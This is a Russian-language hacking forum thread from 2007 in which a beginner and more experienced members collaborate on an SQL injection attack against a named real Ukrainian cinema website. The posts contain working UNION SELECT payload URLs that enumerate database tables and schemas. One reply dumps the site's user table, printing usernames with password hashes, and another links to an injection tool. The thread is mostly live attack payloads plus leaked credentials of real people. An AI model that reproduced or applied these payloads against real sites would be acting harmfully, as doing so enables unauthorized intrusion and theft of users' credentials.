Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
07.10.2007, 01:19
|
|
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723
Репутация:
22
|
|
Sql проклятый)
Прет Всем!)
Ребят я зараниее предупреждаю что я новичок в этом..так что не грубить, а понимать)
Так вот. Вчера один чел(тоже новичок) дал мне одну ссылку на скуль иньекцию...
вот
http://www.kino-ukraina.com.ua/news/?nid=-1'+union+select+1,2,3,database(),5,user()/*
ну мы начели капать что как ..хотели найти пассворд и т.д. .... так искали где то час или больше ) без результатно..потом я предложил такой способ
http://www.kino-ukraina.com.ua/news/?nid=-1'+UNION+SELECT+1,2,3,COLUMN_NAME,5,6+FROM+INFORMA TION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='users'+LIMIT +1,1/*
поскольно у него выделенка  ) он быстрее подобрал)..
оказалось LIMIT 3,1 типо 3-ая колонка - pwd ..
но при вводе
http://www.kino-ukraina.com.ua/news/?nid=-1'+UNION+SELECT+1,2,3,pwd,5,6+From+users/*
выводится "getLink fatal error: Table 'kinosite.users' doesn't exist"
отсюда я понял что надо найти какую то замену типо ***.users в местно киносайт ( правдно я этот момент не до конца поянл почиму так )..ну начал подбирать таблицы своими руками в стиле
http://www.kino-ukraina.com.ua/news/?nid=-1'+UNION+SELECT+1,2,3,TABLE_NAME,5,6+FROM+INFORMAT ION_SCHEMA.TABLES+LIMIT+1,1/*
дошел до 39...и нашел там Users но по неизвестной мне причине при
http://www.kino-ukraina.com.ua/news/?nid=-1'+UNION+SELECT+1,2,3,pwd,5,6+From+Users.users/*
выводится ошибка
getLink fatal error: SELECT command denied to user 'site'@'localhost' for table 'users'
плз скажите в чем моя ошибка?(  |
|
|
07.10.2007, 01:23
|
|
Reservists Of Antichat - Level 6
Регистрация: 23.08.2007
Сообщений: 1,237
Провел на форуме:
18127311
Репутация:
1676
|
|
На чтение users прав не хватает
|
|
|
|
07.10.2007, 01:23
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154
Репутация:
126
|
|
не у теб одного такие проблемы пользуйся прогой для подбора таблиц Вот ссылка не нее и ман тоже там
https://forum.antichat.ru/thread40545-SQL+TOOLS.html
|
|
|
|
07.10.2007, 01:27
|
|
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723
Репутация:
22
|
|
Сообщение от Kaimi
На чтение users прав не хватает
а что тада делать то?
|
|
|
|
07.10.2007, 01:30
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
выведи название таблици
http://www.kino-ukraina.com.ua/news/?nid=-1'+UNION+SELECT+1,2,3,concat_ws(0x3A,table_schema, TABLE_NAME),5,6+FROM+INFORMATION_SCHEMA.TABLES+LIM IT+39,1/*
*дополнение
http://www.kino-ukraina.com.ua/news/?nid=-1'+UNION+SELECT+1,2,3,pwd,5,6+From+cin.Users/*
Admin : 1B2M2Y8AsgTpgAmY7PhCfg==
test : tZxnvxlqR1gZHkL3ZnDOug==
tanyak : qbe6cHg7YX6ZmNxN2C6zxQ==
valia : +4dYKCX50oqNQsXl5eiyPQ==
oksana : Hk02F31xu7NVjkOvlXfXDg==
zhenya : 1ooYJ1RVrj6qLCke67RubQ==
oksanad:tZxnvxlqR1gZHkL3ZnDOug==
tanya:xN6M7WIUNFYU0z+wsWqKzQ==
valya:KsZ12HUk/jfWDkhq9WV0Tg==
luda:+AvwVScVeowqe7Y7IvSaqg==
angela:3nOZiAJoBUi5FvGUf/utdg==
http://www.kino-ukraina.com.ua/news/?nid=-1'+UNION+SELECT+1,2,3,count(*),5,6+From+cin.Users/*
Вообщем их там 19 человек
Последний раз редактировалось halkfild; 07.10.2007 в 01:44..
|
|
|
|
07.10.2007, 01:35
|
|
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723
Репутация:
22
|
|
спс попробую
|
|
|
|
07.10.2007, 01:37
|
|
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723
Репутация:
22
|
|
только не пойму
во такой вывод а что такое "cin" ? что такое вообще table_schema ? |
|
|
|
07.10.2007, 01:43
|
|
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723
Репутация:
22
|
|
ооо прикольно СПС огромное!
|
|
|
|
07.10.2007, 01:44
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
Можно проще без лимита
Код:
http://www.kino-ukraina.com.ua/news/?nid=-1'+UNION+SELECT+1,2,3,table_schema,5,6+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME='users'/*
cin.users
о такой вывод а что такое "cin" ? что такое вообще table_schema ?
Это имя базы данных(schema), в СУБД может быть несколько разных БД с разными таблицами.
Читай здесь https://forum.antichat.ru/showpost.php?p=442627&postcount=26 |
|
|
|
07.10.2007, 01:45
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
дак я выше написал уже как вывести пользователей да ипользователей вывел =))) их там 19 штук))
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?476077){kind=avatar}
Похожие темы
Линейный вид
